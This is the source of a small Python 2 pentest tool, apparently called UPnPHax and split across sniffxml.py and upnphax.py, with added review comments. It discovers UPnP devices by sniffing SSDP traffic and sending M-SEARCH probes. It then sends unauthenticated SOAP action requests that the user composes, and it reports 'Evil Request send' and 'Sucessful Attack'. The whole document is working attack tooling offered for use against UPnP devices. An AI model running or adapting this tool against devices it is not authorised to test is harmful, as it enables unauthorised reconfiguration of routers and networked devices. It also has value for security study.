sniffxml.py:
#!/usr/bin/env python
#
# sniffXML.py is a part of upnpHax.py
#
#Author: St0rn
#Website: anbu-pentest.com
#
#
# NOTE(review): Python 2 source (print statements, raw_input in the
# companion script); it does not run unmodified under Python 3.

from scapy.all import *
from os import system

## Sniff NOTIFY packet to get some UPnP device XML Configuration url ##
def sniffXML():
    """Passively capture UDP traffic and print every SSDP NOTIFY payload
    addressed to port 1900.

    Blocks inside scapy's sniff() until capture stops.  Packet capture
    typically requires raw-socket privileges; if sniff() raises for any
    reason only a generic message is printed (the except clause is bare).
    Returns None.
    """
    def upnp_sniff(p):
        # Per-packet callback.  Only UDP packets that carry a payload and
        # have destination port 1900 are considered; the destination
        # address is not checked, so unicast as well as multicast traffic
        # to that port matches.
        if p.haslayer(UDP) and p.haslayer(Raw):
            if p[UDP].dport == 1900:
                # Plain substring test on the raw payload; the whole
                # NOTIFY message (headers included) is printed unparsed.
                if "NOTIFY *" in p[Raw].load:
                    print "\n\n"+p[Raw].load
    try:
        # BPF filter "udp" narrows the capture before the callback runs.
        sniff(prn=upnp_sniff, filter="udp")
    except:
        # Bare except: also swallows KeyboardInterrupt and SystemExit
        # raised inside the try, not just capture set-up errors.
        print "\n[-] Can't launch sniffer :/\n"

# Module-level side effects on execution: clear the terminal via a
# hard-coded binary path, then block in the sniffer.
system("/usr/bin/clear")
print "\n[*] Waiting for XML configuration URL\n\n"
sniffXML()
upnphax.py:
#!/usr/bin/env python
#
#Author: St0rn
#Website: anbu-pentest.com
#
#

from os import system
from sys import exit
from subprocess import Popen
from socket import *
from scapy.all import *
# NOTE(review): two star-imports; anything exported by scapy.all shadows a
# same-named name from socket.  `random` (used in msearch) and IP/UDP/Raw/
# sr1 are in scope only through the scapy star-import -- confirm that
# `socket`, `AF_INET` and `SOCK_STREAM` still resolve to the stdlib objects
# with the installed scapy version.

## Var ##
# Interactive session state shared with the main loop at the bottom.
conf=list()    # "key:value" lines collected inside a "soap {" block; reset after each send
param=dict()   # action arguments entered under "!args"; never cleared between requests
cont=str()     # current input line while inside a "soap {" block

## Func ##
def help():
    """Print the command reference for the interactive prompt.

    Shadows the builtin help(); only this script's usage text is available
    at the prompt.
    """
    print " ################# Help #################\n"
    print " -------------- General --------------"
    print " i, info ......... Script Informations"
    print " c, clear ................. clear cli"
    print " e, exit ................ exit script"
    print " msearch:ip ...... Send msearch to ip"
    print " sniffxml . XML config file discovery"
    print " soap { ....... Configure Request"
    print " } ...... Stop configuration and send\n"
    print " -------- Configuration Syntax --------"
    print " Param:Value \n"
    print " ------- Configuration Commands -------"
    print " ip ................. UPnP Device IP"
    print " port ............... UPnP Device Port"
    print " ctrlurl .................... Control url"
    print " service ................ Service name"
    print " action .................. Action name"
    print " !args ..... Configure Action Arguments"
    print " ! . Stop Action Param Configuration\n"
    print " ########################################\n"

def banner():
    """Print the start-up banner."""
    print "\n ########################################"
    print " # UPnP Hax #"
    print " # UPnP To The Max #"
    print " ########################################\n"

def info():
    """Print the script description and author line."""
    print " UPnPHax is a script to exploit UPnP Vulnerabilities."
    print " Author: St0rn"
    print " Anbu-pentest.com"

def clear():
    """Clear the terminal by running /usr/bin/clear (hard-coded path)."""
    system("/usr/bin/clear")

def initSocket(ip,port):
    """Open a TCP connection to (ip, int(port)) and return the socket.

    No timeout is set, so connect() can block indefinitely.  Propagates
    ValueError when port is not numeric and socket.error on connect
    failure; the caller wraps the call in a bare except.
    """
    s=socket(AF_INET,SOCK_STREAM)
    s.connect((ip,int(port)))
    return s

def msearch(target):
    """Send one SSDP M-SEARCH to target:1900 and print the first reply.

    The datagram is built and sent with scapy (sr1: send one packet, wait
    for one answer), which needs raw-socket privileges.  The source port
    is chosen at random per call.  If no answer arrives sr1 returns None
    and the indexing of rep fails; that error, like any other, is turned
    into the generic failure message by the bare except.  Returns None.
    """
    req = 'M-SEARCH * HTTP/1.1\r\nHost:239.255.255.250:1900\r\nST:upnp:rootdevice\r\nMan:"ssdp:discover"\r\nMX:3\r\n\r\n'
    ip=IP(dst=target)
    udp=UDP(sport=random.randint(1,65535), dport=1900)
    pck = ip/udp/req
    try:
        rep = sr1(pck, verbose=0)
        # Prints the raw payload of the reply, headers included.
        print "\n%s" %rep[Raw].load
    except:
        print "\n [-] Can't send packet :/\n"

def saopRequest(upnpDevice,port,url,service,action,paramDico):
    """Build a SOAP-over-HTTP request string for a UPnP action.

    Args:
        upnpDevice: device host, used in the request line and Host header.
        port: device port (string or int; formatted with %s).
        url: control path, appended after "/" to the absolute request URI.
        service: UPnP service type name, placed in the urn:schemas-upnp-org
            namespace (version fixed to 1).
        action: action name, used as the body element and SOAPAction.
        paramDico: mapping of argument name -> value, each emitted as
            <name>value</name> inside the action element.

    Returns:
        The complete request text (headers, blank line, XML body).

    Every value is interpolated verbatim: nothing is XML-escaped or
    validated, so the caller's input shapes the request byte-for-byte.
    Content-Length is len(content), which in Python 2 counts str bytes.
    """
    # SAOP Envelope
    content='<?xml version="1.0"?>'
    content+='<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
    content+='<s:Body>'
    content+='<u:%s xmlns:u="urn:schemas-upnp-org:service:%s:1">' %(action,service)
    ## Param handling (original: "Param gestion") ##
    # `param` here is a loop-local name, distinct from the module-level
    # dict of the same name that the main loop passes in as paramDico.
    for param,value in paramDico.items():
        content+='<%s>%s</%s>' %(param,value,param)
    ## End of param handling
    content+='</u:%s>' %action
    content+='</s:Body>'
    content+='</s:Envelope>'
    # Header -- HTTP/1.0 with an absolute URI in the request line.
    req='POST http://%s:%s/%s HTTP/1.0\r\n' %(upnpDevice,port,url)
    req+='Content-Type: text/xml;charset="utf-8"\r\n'
    # Note: this header ends in "\n\r", unlike the CRLF on every other line.
    req+='SOAPAction: "urn:schemas-upnp-org:service:%s:1#%s"\n\r' %(service,action)
    req+='User-Agent: UPnPHax\r\n'
    req+='Host: %s:%s\r\n' %(upnpDevice,port)
    req+='Content-Length: %s\r\n' %len(content)
    req+='\r\n'
    req+=content
    return req

## Main ##
# Interactive read-eval loop.  The enclosing try handles only
# KeyboardInterrupt; any other exception that escapes the inner handlers
# (e.g. a ValueError from the two-way split below) ends the script with a
# traceback.
clear()
banner()
try:
    while True:
        rep=raw_input(" > ")
        """ Gestion command """
        # Command dispatch (original: "Gestion command").  These are
        # independent `if`s, not elif, and most use substring tests, so
        # one input line can trigger more than one branch.
        if rep.lower()=="i" or rep.lower()=="info":
            info()
        if rep.lower()=="h" or rep.lower()=="help":
            help()
        if rep.lower()=="c" or rep.lower()=="clear":
            clear()
        if rep.lower()=="e" or rep.lower()=="exit":
            exit(0)
        if "msearch" in rep.lower() and ":" in rep:
            # Everything between the first and second ":" is the target.
            msearch(rep.split(":")[1])
        if "sniffxml" in rep.lower():
            # Fixed command string through the shell; no user input is
            # interpolated.  "python" and "sniffxml.py" are resolved via
            # PATH and the current working directory, so this only works
            # when run from the script's own directory.
            Popen("xterm -e python sniffxml.py", shell=True)
        if "soap" in rep.lower() and "{" in rep.lower():
            # Configuration block: collect "key:value" lines until "}".
            while True:
                cont=raw_input(" ")
                if "}" in cont:
                    """ creation paquet saop """
                    # Build the SOAP request (original: "creation paquet
                    # saop") from the collected lines.  The two-way unpack
                    # raises ValueError, which nothing here catches, when
                    # a line holds more than one ":".  Keys not configured
                    # leave ip/port/ctrlurl/service/action unbound; the
                    # resulting NameError is caught by the bare excepts
                    # below and reported as a socket/request failure.
                    for i in conf:
                        cmd,val=i.split(":")
                        if cmd.lower()=="ip":
                            ip=val
                        if cmd.lower()=="port":
                            port=val
                        if cmd.lower()=="ctrlurl":
                            ctrlurl=val
                        if cmd.lower()=="service":
                            service=val
                        if cmd.lower()=="action":
                            action=val
                    """ Envoie """
                    # Send (original: "Envoie").
                    try:
                        sock=initSocket(ip,port)
                    except:
                        print "\n [-] Can't create socket.."
                        exit(0)
                    try:
                        req=saopRequest(ip,port,ctrlurl,service,action,param)
                        # send() may transmit only part of the buffer; its
                        # return value is not checked.  A single recv()
                        # reads at most 64 KiB of the reply, and success is
                        # judged by a substring test on that chunk.
                        sock.send(req)
                        print "\n [+] Evil Request send"
                        rcv=sock.recv(65536)
                        if "200 OK" in rcv:
                            print " [+] Sucessful Attack\n"
                        else:
                            print " [-] Fail..\n"
                        sock.close()
                    except:
                        # The socket is not closed on this path before exit.
                        print "\n [-] Can't send request.."
                        exit(0)
                    # Only conf is reset; param keeps its entries for the
                    # next request.
                    conf=list()
                    break
                    # Unreachable: follows the break above.
                    print " "
                elif ":" not in cont.lower() and "!" not in cont.lower():
                    print "\n [!] Syntax Error, this line is not saved\n"
                else:
                    if "!args"in cont:
                        # Argument sub-prompt: "name:value" lines go into
                        # the module-level param dict; a line that is
                        # exactly "!" ends the sub-prompt.  A line starting
                        # with "!" but not equal to "!" matches none of the
                        # three tests and is silently ignored.  As above, a
                        # value containing ":" raises an uncaught ValueError.
                        while True:
                            p=raw_input(" args> ")
                            if ":" in p and "!" not in p:
                                cmd,val=p.split(":")
                                param[cmd]=val
                            if ":" not in p and "!" not in p:
                                print "\n [!] Syntax Error, this line is not saved\n"
                            if p.lower()=="!":
                                break
                    else:
                        # Any other "key:value" line is stored unparsed
                        # until "}" is entered.
                        conf.append(cont)
except KeyboardInterrupt:
    print "\n e or exit + enter... Isn't difficult?!"
    exit(0)
St0rn